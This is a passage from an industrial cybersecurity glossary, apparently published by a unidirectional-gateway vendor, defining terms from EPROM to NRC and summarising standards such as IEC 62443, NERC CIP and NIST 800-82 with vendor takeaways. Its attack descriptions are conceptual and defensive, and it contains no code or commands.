Encoding information so that only authorized parties can read the information.

EPA Cybersecurity for the Water Sector (Resource)

What is it: A cybersecurity resources for drinking water and wastewater systems for the United States.

Relevancy to Unidirectional Gateways: Potentially relevant as it emphasizes cybersecurity measures for water infrastructure, possibly including unidirectional gateways.

EPROM (erasable programmable read-only memory)

A read-only memory whose contents can be erased by ultraviolet light or other means and reprogrammed using a pulsed voltage.

Espionage (Cyber Espionage)

The use of computer networks to gain illicit access to confidential information, typically that held by a government or other organization.

Executable

A file or program able to be run by a computer.

Federal Energy Regulatory Commission (FERC)

The Federal Energy Regulatory Commission (FERC) is an independent agency that regulates the transmission of electricity, natural gas, and oil across state lines in the United States.

File System

A software mechanism that organizes and manages files on a storage device, such as a hard drive, solid state drive (SSD), or USB flash drive. It defines how files are named, stored, accessed, and organized.

Firewalls

What they are: Deep in the heart of every firewall is a router, because like routers, firewalls forward network messages from one network to another. Most firewalls are of course much more than routers – firewalls also contain software that looks at each message trying to pass through the router piece of the firewall and asks the question “is this message allowed?” If the software decides the message is allowed, it forwards the message, otherwise it most often drops the message. Modern / next-gen firewalls generally also have built in VPNs, IDS’s, IPS’s, and “deep packet inspection” that claims to understand many IT and sometimes OT protocols and let you craft rules such as “allow Facebook status updates, but do not allow images to be posted” and “allow writes to these Modbus registers, but not those.”

Where to use: Firewalls are used most effectively between networks at the same level of criticality. That is: within industrial / OT networks, within business networks, and between business networks and the Internet. Properly configured firewalls can stop or slow down many kinds of online cyber-sabotage attacks that originate on external networks.

Intrinsic Limitations: Firewalls control the flow of network packets – they do nothing about potentially contaminated USB drives, or laptops, or cell phones being carried into OT networks. Almost all modern, popular firewalls are complex and easily misconfigured in ways that are difficult to detect. Firewalls are intrinsically software, with vulnerabilities – for evidence of this look at your favorite firewall vendor’s website and count the number of security updates they’ve issued recently. Exploit these vulnerabilities and the protective function of the firewall can be subverted. There are many other ways that attackers defeat firewalls, for example disguising attacks inside packets that look legitimate to the firewall, so the firewall passes the attack through to the protected network. For evidence of how porous firewalls are, look at ransomware attacks. Almost all the hundreds of thousands of ransomware attacks that reach IT networks every year pass through the organization’s IT/Internet firewall.

Firmware

Software built into the hardware of a computer system. Firmware is most often stored in read-only-memory chips, or flash memory built into a device.

Fuzzing

A kind of semi-automatic message-based attack. Legitimate messages in some communications protocol are changed in semi-random ways, so that the messages are no longer valid messages. Large numbers of different kinds of these variants are sent to a target computer, and the computer is observed. When the computer crashes or otherwise malfunctions, the recent message stream is replayed and examined to determine which variant caused the malfunction, and further research is done to determine if that malfunction causes a vulnerability which can be exploited.

Gazillion

Any unreasonably-large number.

Generating Unit

A set of equipment in an electric power plant focused on a single generator. For example, in a coal-fired plant, each generating unit is a single furnace, boiler, steam turbine and generator. In a hydro plant, a generating unit is a water turbine and generator.

GRC - Governance, Risk, and Compliance

Definition: Governance, Risk, and Compliance (GRC) is a strategic framework used by organizations to align their IT and business objectives while managing risks and meeting regulatory requirements. GRC encompasses three main components:

Governance: Establishing policies and processes that ensure organizational goals are met.
Risk Management: Identifying, assessing, and mitigating risks that could impact the organization’s ability to achieve its objectives.
Compliance: Ensuring that the organization adheres to laws, regulations, and standards relevant to its operations.

Importance in Cybersecurity: GRC is critical in cybersecurity as it provides a structured approach to managing and mitigating risks associated with information security threats. By integrating governance, risk management, and compliance efforts, organizations can improve their overall security posture, respond effectively to incidents, and reduce the likelihood of data breaches or regulatory fines.

Example in OT Security: In an OT environment, GRC practices help ensure that industrial systems comply with industry standards and regulations while managing risks associated with operational technology. For example, a manufacturing plant might implement GRC processes to ensure that all safety protocols are followed, that employee access to control systems is appropriately governed, and that risks related to cyber threats or equipment failures are continuously assessed and mitigated. This holistic approach helps protect critical infrastructure and maintain operational integrity.

Hardware

Computer hardware includes the physical parts of a computer, such as the central processing unit (CPU), random access memory (RAM), motherboard, computer data storage, graphics card, sound card, and computer case. It includes external devices such as a monitor, mouse, keyboard, and speakers.

HILF

HILF is an acronym for “high-impact, low-frequency”. It’s a term used to describe an event that’s rare but has a significant impact when it does happen. HILF events are often unpredictable and irregular, and can cause a lot of disruption or catastrophic consequences.

Historian

A database optimized to store and manipulate large amounts of time-sequenced data, such as sensor readings from an industrial process.

HMI

Human Machine Interface – A software system used by a control system operator to summarize, visualize and control large numbers of sensors and actuators in an industrial control system.

Honeypot

A computer pretending to be an attack target, designed to lure attacks as part of detection and analysis efforts. Limitations: no emulation of a real system is perfect. When attackers or malware artifacts detect that they are interacting with a honeypot, they may call off the attack or take other measures to avoid detection.

Host Firewalls

What they are: Host firewalls are firewall software built into hosts. Instead of routing allowed messages from one network to another, host firewalls inspect traffic, decide if it is allowed, and permit allowed incoming messages deeper into the host for processing, or allow messages to leave the host destined for various networks.

Where to use: Host firewalls are recommended on all industrial equipment, but can be difficult to apply to existing installations, and difficult to manage as communications needs evolve, typically very slowly, over time.

Intrinsic Limitations: Host firewalls control the flow of network packets – they do nothing about potentially contaminated USB drives or DVD media entering a computer. Host firewalls are software, with vulnerabilities. Many host firewalls come with built in network IPS capabilities, with all the limitations of those systems. Modern attacks, however, rarely exploit host firewalls. More commonly, these attacks are carried into compromised hosts inside of encrypted, allowed connections to other hosts, users, and devices – connections that the host firewall is configured to permit.

Host Intrusion Detection Systems

What they are: Host IDS look at files, memory, kernel calls and other characteristics of computers (hosts), looking for indicators of an attack in progress. Signature-based systems match host characteristics against rules / signatures looking for a match. When a match is found, an alert is generated warning of a potential attack in progress. Anomaly-based systems use “machine learning” to look at patterns of host / memory / CPU activity and raise alerts when unusual changes are detected in these patterns. Vendors compete on patterns, and common patterns include file names, contents, and hashes, unusual patterns of execution such as connecting to another process in debug mode, requests to the computer user to escalate privilege, installing software and especially device drivers and many other patterns.

Where to use: Host IDS are used much less commonly than host IPS systems, such as anti-virus and application allow-listing systems. Host IDS or IPS are recommended for all industrial systems that tolerate or support these systems.

Intrinsic Limitations: All host IDS are software, with vulnerabilities known and unknown that can be exploited. Signature-based IDS can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based IDS can detect attacks that “look” suspicious with respect to the characteristics the IDS is monitoring / learning. Attacks that “look” normal can go unreported. False alarms / false positives are a bane of all anomaly-based host IDS systems. System administrators often need to “tune” IDS systems to eliminate false alarms. “Low and slow” attacks can defeat IDS as well – attacks that change the “normal” behavior of compromised assets over time so slowly that normal machine learning and false alarm elimination processes “tune out” the attack indicators. All IDS are also susceptible to alert flooding attacks, where the attacker creates a “noisy” distraction in another part of the business that creates many high-priority alerts while pursuing the attacker’s real objective creating only a few low-priority alerts. And in the end, fast attacks risk bringing about unacceptable consequences despite IDS, because human or even automated incident response is too slow to prevent the consequence. Many low-level devices such as PLCs do not support the installation of third-party host IDS or run operating systems for which no such systems exist. Many parts of industrial control systems cannot tolerate the long file-system scans used by signature-based systems because of the performance impact of such scans, and critical systems may not have been tested for compatibility with arbitrary Host IDS or IPS systems.

HTTP

(Hypertext Transfer Protocol) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems.

HTTPS

Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It uses encryption for secure communication over a computer network, and is widely used on the Internet.[1][2] In HTTPS, the communication protocol is encrypted using Transport Layer Security (TLS) or, formerly, Secure Sockets Layer (SSL). The protocol is therefore also referred to as HTTP over TLS,[3] or HTTP over SSL.

HVAC

Heating, ventilation, and air conditioning (HVAC) is the use of various technologies to control the temperature, humidity, and purity of the air in an enclosed space. Its goal is to provide thermal comfort and acceptable indoor air quality. HVAC system design is a subdiscipline of mechanical engineering, based on the principles of thermodynamics, fluid mechanics, and heat transfer.

IACS

Industrial Automation and Control Systems (IACS) – Also known as Operational Technology (OT), IACS are systems that control and measure things like the distribution of energy and gas, the functioning of locks and bridges, and the processing of nuclear material.

IAD

Integrated access device: A customer premises device that provides access to the internet and wide area networks

IAEA

IAEA stands for the International Atomic Energy Agency, an autonomous organization within the United Nations system:

IAM

Identity and Access Management. IAM is a framework of policies, processes, and technologies that ensure the right people have access to the right resources at the right times.
The purpose of IAM is to improve security and user experience, enable better business outcomes, and increase the viability of mobile and remote working and cloud adoption.

ICCP

Inter-Control Center Communications Protocol: A standard for communication in the electric power sector that allows for the exchange of data between utilities and other entities.

ICS

Industrial Control System: A computer system that monitors and controls industrial processes and infrastructure. ICSs are used in many industries, including oil and gas, energy, water and wastewater, and manufacturing.

IDS

An intrusion detection system (IDS) is a network security tool that monitors traffic and devices for suspicious or malicious activity

IEC

The International Electrotechnical Commission (IEC; French: Commission électrotechnique internationale) is an international standards organization that prepares and publishes international standards for all electrical, electronic and related technologies – collectively known as “electrotechnology”

IIoT

IIoT (Industrial Internet of Things) refers to interconnected sensors, instruments, and other devices networked together with industrial applications. It enables data collection, exchange, and analysis in industrial settings like manufacturing, energy, and infrastructure to improve efficiency, monitoring, and automation of industrial processes. Key applications include predictive maintenance, real-time production monitoring, supply chain optimization, quality control automation, and asset tracking.

INL

Idaho National Laboratory: INL is one of the U.S. Department of Energy’s (DOE’s) national laboratories. The laboratory performs work in each of DOE’s strategic goal areas: energy, national security, science and environment. INL is the nation’s leading center for nuclear energy research and development.

Instrumentation

Instrumentation Engineers are responsible for designing, developing, and maintaining the instruments and systems that measure, control, and monitor industrial processes. Their work is critical in ensuring the precision, efficiency, and safety of operations across various industries.

Interactive Remote Control

Device that allows users to control multiple electronic devices with a single operation. Remote controls use electronic signals or communication protocols to allow users to control devices from a distance.

IoT

Internet of Things, refers to the collective network of connected devices and the technology that facilitates communication between devices and the cloud, as well as between the devices themselves.

Identity and Access Management

What they are: Identity and Access Management (IAM) systems manage passwords and permissions. On Windows networks, Microsoft’s Active Directory products are the most widely used IAM systems. The term IAM can also refer to built-in users and permissions in software, hosts, and devices, not only external IAM services.

Where to use: Users, passwords and permissions are recommended for most industrial systems that tolerate such protections. Exceptions are equipment that is involved in or can trigger emergency shutdowns – as a rule, safety shutdowns must be triggerable by any person in an unsafe environment, whether or not they have or remember a password. Older systems such as PLCs, RTUs, and other embedded devices may support only one or a very limited number of users, permissions, and roles. Some systems, such as HMI workstations, have timing constraints that prohibit using operating system usernames, passwords, and permissions. Dangerous physical processes, such as petrochemical pipelines, can only be operated “blind” for a limited number of seconds before an emergency shutdown is required. It can take much longer than those limited number of seconds at shift change for the outgoing operator to shut down all applications and log out, so that a new operator can log back in and restart all the applications.

Intrinsic Limitations: All IAM systems are software, with vulnerabilities that can be exploited. Indeed, Active Directory (AD) systems are prime targets of remote-control attacks. The attackers find some way to steal AD administrator credentials or otherwise take over the AD server, create new accounts for themselves with universal access, and log in using those accounts to work their will upon the network of systems. IAM servers are not security tools – they are identity and permission management systems that urgently need to be secured.

IEC/ISA 62443 (Standard)

What is it: This standard addresses the issue of security for industrial automation and control systems (IACS), and outlines security requirements for control systems while assigning systems different security levels. Given that control systems are increasingly interconnected with non IACS (OT) networks – the increased connectivites introduce greater risk for cyber attack against control system hardware and software. These vulnerabilities could lead to health, safety and environmental consequences. The cyber security approach for IACS needs to consider functional requirements, risk assessments and operational issues. IACS security goals are different from IT security goals: IACS security measures must prevent the loss of essential services and emergencies. IT is more focused on protecting information rather than human lives and physical assets. The main objective of ISA 62443 series is to provide a framework that addresses security vulnerabilities in IACS and apply the necessary defensive mitigations. The intended audience is the IACS communities including asset owners, system integrators, product suppliers, service providers and compliance authorities. The goal is to define a common set of requirements to reach heightened security levels. There are seven foundational requirements for control systems: identification and authentication control, use control, system integrity, data confidentiality, restricted data flow, timely response to events, and resource availability. Security measures applied to these requirements shall not cause loss of protection, loss of control or loss of view.

Relevancy to Unidirectional Gateways: The standard mentions unidirectional gateways four times when prescribing security measures for restricted data flow, zone boundary protection, malicious code protection and denial of service protection. The standard recommends unidirectional gateways for networks controlling the most important and most securitized assets within IACS. The standards also recommends segmenting networks in control system networks from non-control system networks to reduce exposure to threats to control system reliability.

Waterfall Takeaway: The standard clearly states that the security goals and requirements for industrial control systems differ from those of IT networks. With the increased connectivity of business networks to control networks, new vulnerabilities present themselves. This standard recommends that networks protecting the most critical assets be identified as such and be protected by the most stringent methods, one of which being unidirectional gateways.

Source: Wikipedia Article

IEC‑62443‑3‑3 (99.03.03) (Standard)

What is it: Security for industrial automation and control systems Part 3-3: This standard covers the system security requirements and security levels. The cyber security approach for IACS requires considering the functional requirements, risk assessments, and operational issues. IACS security goals are different from IT security goals: IACS security measures are focused on preventing the loss of essential services and emergencies. IT is more focused on protecting information rather than human lives and physical assets.

Source: isa.org

IP

IP stands for “Internet Protocol,” which is the set of rules governing the format of data sent via the internet or local network. In essence, IP addresses are the identifier that allows information to be sent between devices on a network: they contain location information and make devices accessible for communication.

ISA SP99

A committee of the International Society of Automation (ISA) that develops standards and practices for industrial systems cybersecurity:
Purpose: To improve the security of industrial automation and control systems, including confidentiality, integrity, and availability

ISO

International Organization for Standardization is a worldwide federation of national standards bodies. ISO is a nongovernmental organization that comprises standards bodies from more than 160 countries, with one standards body representing each member country.

ISO/IEC 27001 (Standard)

Summary: Information security management systems

Relevancy to Unidirectional Gateways: Indirectly relevant as it outlines information security management systems that can include unidirectional gateways.

Source: ISO

Jamming

Definition: Jamming is a type of cyberattack where an attacker deliberately disrupts or interferes with wireless communications by overwhelming the network with noise or false signals, effectively “jamming” the communication channels. This can prevent devices from sending or receiving legitimate signals, causing service outages or communication delays.

Importance in Cybersecurity: Jamming attacks are particularly problematic in wireless networks, such as Wi-Fi, cellular, or radio frequency (RF) communications. In critical systems, jamming can lead to denial of service (DoS), disrupting communications and potentially causing system failures. Wireless jamming is a concern in environments where reliable communication is essential for safety and operational efficiency.

Example in OT Security: In OT environments, jamming attacks pose a significant threat, especially in industries that rely on wireless communication for monitoring and control, such as energy grids, oil and gas pipelines, or manufacturing plants. For example, a jamming attack on the wireless sensors or control systems of an industrial plant could prevent operators from receiving critical real-time data, leading to delayed responses to dangerous conditions or even causing equipment failure.

Kerberos

A computer network authentication protocol that verifies the identity of users and hosts on a network. Kerberos enables secure communication between devices on a network by authenticating users and preventing passwords from being sent over the internet.

Kernel

A kernel, in the context of computing, is essentially the core of an operating system. It is the fundamental layer that exists between the computer hardware and the software. The kernel is responsible for interacting with hardware, and it is often considered the nucleus of a computer’s operating system.

Keylogger

Definition: A keylogger is a type of malware or hardware device that records keystrokes on a keyboard without the user’s knowledge. Keyloggers capture everything typed, including passwords, emails, personal messages, and other sensitive information. They are commonly used by cybercriminals to steal credentials or monitor user activity.

Types of Keyloggers:

Software-based keyloggers: These are malicious programs installed on a computer to capture and log keystrokes.
Hardware-based keyloggers: These devices are physically attached to a keyboard or computer and record keystrokes without needing software.

Importance in Cybersecurity: Keyloggers are a significant threat because they can steal sensitive information without raising immediate suspicion. They are often used in phishing campaigns, insider attacks, or as part of broader espionage efforts. Keyloggers can be difficult to detect, especially if they are hardware-based or use advanced obfuscation techniques.

Example in OT Security: In an OT environment, a keylogger could be used to capture login credentials of engineers or operators who control critical systems, such as a SCADA system or a Human-Machine Interface (HMI). Once an attacker gains access to these systems through stolen credentials, they could manipulate processes, shut down systems, or cause physical damage to industrial equipment. This makes securing workstations and monitoring for keylogger activity essential in protecting OT systems.

Kiosk

Kiosk computers are terminals for interaction to access different aspects of a computer such as information or software. They are used to make interactions with customers faster by giving them a self service option, shortening the process.

KVM Switch

A KVM switch (with KVM being an abbreviation for “keyboard, video, and mouse”) is a hardware device that allows a user to control multiple computers from one or more sets of keyboards, video monitors, and mouse.

Lateral Movement

Definition: Lateral movement refers to a tactic used by cyber attackers to move through a network after gaining initial access. Instead of targeting a specific endpoint, attackers move “laterally” across systems and devices within the network to escalate privileges, gain further access, or exfiltrate sensitive data. Lateral movement often involves compromising additional accounts, exploiting vulnerabilities, and using legitimate credentials to avoid detection.

Importance in Cybersecurity: Lateral movement is a key phase in many advanced cyberattacks, particularly Advanced Persistent Threats (APTs). Once an attacker gains a foothold, they aim to spread across the network to reach critical systems and data, often staying hidden for long periods while they gather intelligence or prepare for further attacks. Detecting lateral movement is vital for stopping attackers before they reach high-value targets.

Example in OT Security: In OT networks, lateral movement is especially dangerous because once attackers gain access to an edge device or less secure system, they can move toward more critical control systems like SCADA (Supervisory Control and Data Acquisition) or PLCs (Programmable Logic Controllers). An attacker moving laterally through an OT network could disrupt essential industrial processes or compromise safety systems, causing physical damage or service outages in industries like power generation, manufacturing, or transportation. This makes detecting and blocking lateral movement critical in OT security.

LAN - Local Area Network

Any network enclosed entirely within an industrial site’s physical security perimeter.

LIHF

Low Impact High Frequency, refers to events that occur frequently, predictably and have minimal consequences and disruptions.

Linux

Linux is a free, open-source operating system kernel created by Linus Torvalds in 1991. It forms the foundation for many operating systems (Linux distributions) and powers everything from servers and smartphones to embedded devices. Linux is known for its stability, security, and customizability.

Machinery Regulation (EU) 2023/1230 (Regulation)

What is it: Includes health and safety requirements considering cybersecurity for manufacturing in the EU.

Relevancy to Unidirectional Gateways: Indirectly relevant as it addresses machinery safety, which could involve cybersecurity measures like unidirectional gateways.

Source: EUR-Lex

Malware

Software that is specifically designed to disrupt, damage, or gain unauthorized access to a computer system.

MD5

MD5 (Message Digest Algorithm 5) is a cryptographic hash function that produces a 128-bit hash value. While historically used for digital signatures and file integrity verification, it’s now considered cryptographically broken and unsuitable for security applications due to vulnerability to collision attacks.

MES - Manufacturing Execution System

A software system that monitors and manages the production process in a manufacturing plant:
Purpose: To optimize the manufacturing process by tracking, documenting, and controlling the entire production lifecycle

MIS - Management Information Systems

MIS (Management Information System) is a software system that collects, processes, and organizes business data to support management decisions. It helps organizations track performance metrics, workflows, and resources to improve operational efficiency and strategic planning, especially with today’s increasingly remote workforce.

Modem

A modulator-demodulator, commonly referred to as a modem, is a computer hardware device that converts data from a digital format into a format suitable for an analog transmission medium such as telephone or radio.

NERC

North American Electric Reliability Corporation (NERC) is a not-for-profit international regulatory authority whose mission is to assure the effective and efficient reduction of risks to the reliability and security of the grid.

Network Access Control (NAC)

Any system that restricts participation in network communications to approved devices. The most common such technologies are built into managed switches. These switches restrict communications through the switch to devices with approved MAC addresses. Limitations: NAC systems are software and contain vulnerabilities that may be exploited. NAC is not considered a strong security control suitable for partitioning safety-critical or reliability critical networks from less-critical networks, but can be useful for reducing errors where equipment is connected to critical networks incorrectly. The simplest way to attack most NAC systems is to steal the password and reconfigure the system.

Network Encryption and Authentication

What they are: Encryption and cryptographic authentication are tools used to protect communications sessions from man-in-the-middle attacks. These are attacks where an attacker who has access to the communications system steals information, such as passwords, from the communications, or injects malicious commands into the communications, “hijacks” the communications session, taking the place of one of the endpoints, or otherwise impersonates a legitimate endpoint. Encryption is a mathematical algorithm that combines plain text with keys in such a way as to produce encrypted text that is indecipherable but can be turned back into the original plain text by a recipient with the right keys. Cryptographic authentication is a tamper-detecting “signature” that can be appended to messages, much like conventional error-detecting checksums.

Where to use: While there is a clear consensus that encryption and authentication are essential when communicating across the Internet, there is less consensus in OT environments. Some experts recommend that these cryptographic measures be deployed throughout industrial control systems, from the very lowest to the very highest levels. Other experts observe that this is most often impractical, because of the difficulty of managing encryption keys in these challenging environments. At this writing, practical key management tools for industrial networks exist in only very limited domains – there is no such thing as a cross-vendor, cross-platform encryption and key management tool that can be used for IP network communications, serial communications, and every other kind of communications in an industrial automation system.

Intrinsic Limitations: The simplest way to defeat cryptosystems is to steal the key information. More fundamentally, all cryptosystems are software and thus have vulnerabilities, both discovered and undiscovered. By far the most common way to defeat cryptosystems is neither of the aforementioned, but rather to compromise an endpoint of the encrypted communications and use that endpoint to pivot attacks inside of encrypted, authenticated communications to other devices the compromised endpoint can communicate with legitimately.

Network Intrusion Detection Systems

What they are: Network IDS look at network packets exchanged on a wire or fibre via a tap or exchanged within a managed network switch via a mirror / SPAN port. Signature-based systems match packet contents or sequences of packets and contents against rules / signatures looking for a match. When a match is found, an alert is generated warning of a potential attack in progress. Anomaly-based systems use “machine learning” to look at patterns of communications and raise alerts when unusual changes are detected in these patterns. Vendors compete on patterns, and common patterns include traffic volume, volume per type of connection, sources and destinations of connections, new / unrecognized equipment connected to the network, and which PLC or device registers are being read from or written to. Many Network IDS products have built-in asset inventory features.

Where to use: Network intrusion detection systems are recommended for most industrial networks and IT networks for that matter. We can only optimize what we measure, and so monitoring and measuring what is going on with network communications provides important insights. And if our protective measures fail, Network IDS gives us some hope of detecting attacks in progress and triggering incident response actions before we suffer unacceptable consequences.

Intrinsic Limitations: All network IDS are software, with vulnerabilities known and unknown that can be exploited. Signature-based IDS can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based IDS can detect attacks that “look” suspicious with respect to the characteristics the IDS is monitoring / learning. Attacks that “look” normal can go unreported. And false alarms / false positives are a bane of all IDS systems. System administrators often need to “tune” IDS systems to eliminate false alarms. “Low and slow” attacks can defeat IDS as well – attacks that change the “normal” behavior of compromised assets over time so slowly that normal machine learning and false alarm elimination processes “tune out” the attack indicators. All IDS are also susceptible to alert flooding attacks, where the attacker creates a “noisy” distraction in another part of the business that creates many high-priority alerts while pursuing the attacker’s real objective creating only a few low-priority alerts. And in the end, fast attacks risk bringing about unacceptable consequences despite IDS, because human or even automated incident response is too slow to prevent the consequence.

Network Intrusion Prevention Systems

What they are: Network IPS include network IDS. When the IDS function detects and reports a high-priority attack, the IPS function engages to interrupt the attack in progress. An external IPS may send TCP “reset” packets back into the tap or mirror port the IPS is using to access the packet stream. An in-line IPS built into a firewall can simply start dropping packets on the connection(s) involved in the attack so that further attack packets do not reach the target machine or network. Other attack interruption mechanisms are possible, such as contacting an agent installed on a host that is the endpoint of the attack and instructing that agent to drop the connection or take other protective actions.

Where to use: With all IPS products there is a risk of false alarms / false positives causing the IPS to interrupt benign communications, communications that may be essential to safe or reliable operations. Common wisdom is that IPS are deployed only at the very highest levels of control systems, such as on the IT/OT interface, where false alarms are likely to have only business consequences, not physical consequences. Network IPS that are designed for industrial environments though, generally have had their attack interruption actions tested and approved by vendors and engineering teams, so that even false alarms have only acceptable consequences.

Intrinsic Limitations: All network IPS are software, with vulnerabilities known and unknown that can be exploited. All network IPS include a network IDS, and so are subject to all the limitations of network IDS systems.

NERC CIP (Regulation)

What is it?: The electric power sector leads both North American industry and the world in strong cyber-security standards. Both the NEI and NRC standards in nuclear generation and the North American Electric Reliability Corporation’s Critical Infrastructure Protection (NERC CIP) standards in the Bulk Electric System1 (BES) are seen as among the most demanding cyber-security regimes enforced anywhere in the world. The NERC CIP standards in particular are seen as a model of cyber security for other industries and critical infrastructures. The NERC CIP V5 standards are designed specifically to enhance the reliability of the Bulk Electric System through strong security.

Relevancy to Unidirectional Gateways:The CIP V5 standards recognize that Unidirectional Security Gateways provide security which is stronger than firewalls, and position the gateways as an alternative to firewalls and costly Network Intrusion Detection Systems (NIDS). The V5 CIP standards have 103 requirements overall, and provide exemptions from 37 Medium-Impact requirements, and 5 High-Impact requirements, when Waterfall’s Unidirectional Security Gateways are used to protect an Electronic Security Perimeter (ESP) rather than using firewalls and NIDS. Unidirectional Security Gateways increase the security of critical control systems, simplify and reduce the ongoing cost of CIP V5 compliance programs, and eliminate the need to use high-maintenance firewalls and NIDS.

Waterfall’s takeaway:Waterfall’s Unidirectional Security Gateways are deployed widely in Bulk Electric Systems, especially in power generation applications. The strong security provided by these gateways is recognized by steadily increasing numbers of industry analysts and security experts. In short, the Bulk Electric System is becoming measurably safer, more secure and more reliable as a result of the widespread deployment of Unidirectional Security Gateways.

Source: NERC CIP Cheatsheet

Network Scan

A network scan is a process that identifies active devices on a network and gathers information about them

Network Segmentation

A network security technique that divides a computer network into smaller, more manageable subnetworks: The goal of network segmentation is to improve network performance and security by controlling how traffic flows between the subnetworks. Network administrators can apply different security policies and protocols to each subnet

NIS2 Directive (Directive)

What is it: The NIS2 Directive is an updated EU cybersecurity law that builds on the original NIS Directive (NISD). The goals of NIS2 are to boost cybersecurity, simplify reporting, and create consistent rules and penalties across the EU. By expanding its scope, NIS2 requires more businesses and sectors to take cybersecurity measures, with the ultimate goal of enhancing Europe’s cybersecurity in the long run. With stricter rules to overcome previous limitations, NIS2 will impact a wider range of industries. Entities under NIS2 are classified as essential or important, and the directive outlines security requirements as well as a process for incident reporting.

Relevancy to Unidirectional Gateways: Potentially relevant as it covers EU-wide cybersecurity legislation that may encompass unidirectional gateways for critical sectors.

Waterfall’s takeaway: Articles 21 & 23 are the two primary articles in the NIS2 Directive that OT professionals need to act upon. Article 21: management of cyber risk, while Article 23: reporting. The Directive specifically outlines the penalties for non-compliance with these two articles: max fine is €10,000,000 or 2% of global annual turnover from the previous year. NIS2 includes additional sectors: space, wastewater, public administrations, data center service providers, trust service providers, content delivery networks, and public electronic communications networks and services. Other critical sectors, including postal services, chemicals, and the manufacturing of key products, are also mandated to comply with the regulations. NIS2 imposes direct obligations on management bodies concerning compliance with the legislation. Manufacturing is now under NIS2, this sector is the second-largest target of ransomware attacks with tangible consequences.

Source: EUR-Lex

NISC The Basic Policy of Critical Information Infrastructure Protection (Japanese Policy)

What is it: The Basic Policy of Critical Information Infrastructure Protection – This is a basic shared policy which outlines responsibilities for the government and guidance for operators of critical infrastructure concerning the protection of critical information infrastructure. Its purpose is to give instruction to stakeholders to protect critical infrastructure by reducing the risk of IT outages and ensure prompt recovery after an event. It outlines basic safety principles, information sharing, incident response, risk management and continuous improvement of critical information infrastructure protection. The policy does not acknowledge or recommend any specific type of technology and maintains that the most current and robust technology be leveraged.

Relevancy to Unidirectional Gateways: The unique and unusual part of this standard is in the annexes at the end of the document. As the goal of the document is to “prevent serious effects on the public welfare and socioeconomic activities due to IT outages”, Annex 1 lists all of the specific categories of CII sectors, the applicable operators, the critical control systems and examples of IT outages. Annex 2 goes a step further with “CII Service and Maintenance Levels”. In it, certain maintenance levels and standards are to be maintained at all times. Certain failures in control systems due to IT outages are not allowed to take place. The level of failures is extremely strict, making it seemingly impossible to have any interconnection between control systems and enterprise systems. For example, for electric power supply services “no supply problem incidents of over 10 minutes for supply power of 100,000 kw or more should occur”, and for gas supply services, “no supply problem incidents effecting supply to 20 or more houses should occur as a result of IT outages”. For water systems it is even more strict: “no interruption or decrease of water supply, abnormal quality water supply or serious problems in systems should be caused for supply of water as a result of suspended IT failures”. These stringent standards of service maintenance levels go on for each CII industry sector.

Waterfall’s takeaway: It could be interesting to see how the authors of this policy would go about answering the question of how to ensure these service maintenance levels through different cyber security technology options. For service maintenance levels as strict as these, unidirectional gateway technology would be an appropriate solution.

Source: nisc.go.jp

NIST Framework for Improving Critical Infrastructure Cybersecurity (Standard)

What is it: A “risk-based approach to managing cybersecurity risk”. This framework provides guidance to industry and organizations on managing cybersecurity risk. Critical infrastructure is not a predefined set of industries but rather any system and assets which are vital enough to the United states that if compromised, would result in a debilitating impact on national security, the economy, and/or public health and safety.

Relevancy to Unidirectional Gateways: The Framework is neutral when it comes to technology. It provides a mechanism for organizations to describe current and future state cybersecurity postures, improvement processes and assessment, and communication plans to stakeholders. The framework is unfortunately weak on prevention, and focuses heavily on five core functions; identify, protect, detect, respond, recover. This is due to the fact that it views the functions, categories and subcategories of the framework for IT and ICS to be identical. They have taken a cyber risk framework directly from an IT context and applied it to ICS.

Waterfall’s takeaway: Overall, this is a very IT focused and based framework which has been very lightly modified to be applied to industrial control systems. This framework could apply to any organization, which again begs the question, why apply another generic IT model to ICS? Understanding what is most important to protect from cyber attack in ICS, safety and control, not data and information, is the only way we will be able to provide a valuable framework operators of critical infrastructure can implement.

NIST Special Publication 800-82 Revision 2 Guide to Industrial Control Systems (ICS) Security (Standard)

What is it: Guidance for secure ICS, SCADA, DCS, and other systems performing control functions. The intended audience is ICS communities vital to the operation of US critical infrastructure (90% of which are privately owned and operated).

Relevancy to Unidirectional Gateways: The standard recommends unidirectional gateways to restrict logical access to the ICS network. It also outlines defense in depth strategy for ICS which will ideally have unidirectional gateways to provide logical separation between the corporate and ICS networks. Unidirectional gateways are advised for network segmentation and boundary protection. Separating ICS in a high security domain from the corporate network is ideally and traditionally best achieved through unidirectional gateway technology which restricts communications between connections to a single direction – segmenting the network. The standard describes unidirectional gateways as a combination of hardware and software which makes it physically impossible to send any information back into the source network, the ICS

Waterfall’s takeaway: This standard reflects NIST’s sophisticated understanding of the functionality and importance of unidirectional gateways in control system environments. The authors illustrate the dramatic differences in the goals, vulnerabilities, and risks associated with ICS versus the IT environment, knowing full well that these differences warrant different solutions. Unidirectional gateways are mentioned throughout the document to protect the most critical networks and assets of an ICS from the threat of cyber attacks.

Source: Guide to ICS Security (PDF)

Notpetya

A series of powerful cyberattacks using the Petya malware began on 27 June 2017 that swamped websites of Ukrainian organizations, including banks, ministries, newspapers and electricity firms.[10] Similar infections were reported in France, Germany, Italy, Poland, Russia, United Kingdom, the United States and Australia. ESET estimated on 28 June 2017 that 80% of all infections were in Ukraine, with Germany second hardest hit with about 9%.[2] On 28 June 2017, the Ukrainian government stated that the attack was halted.[13] On 30 June 2017, the Associated Press reported experts agreed that Petya was masquerading as ransomware, while it was actually designed to cause maximum damage, with Ukraine being the main target.

NRC - NEI (Regulation, USA)

The Nuclear Regulatory Commission (NRC) regulates commercial nuclear power plants, and other uses of nuclear materials.

What is it?: Developed to aid nuclear facility licensees in developing and implementing their Cyber Security Plan submittal as required by 10 CFR 73.54, Title 10 of the U.S. Code of Federal Regulations 73.54 “Protection of digital computer and communication systems and networks”. 10 CFR 73.54 requires that each licensee operating a nuclear power plant submit a cyber security plan for Commission review and approval. The Plan’s main objective is to safeguard the health and safety of the public from radiological sabotage from a cyber attack up to and including the Design Basis Threat (DBT).

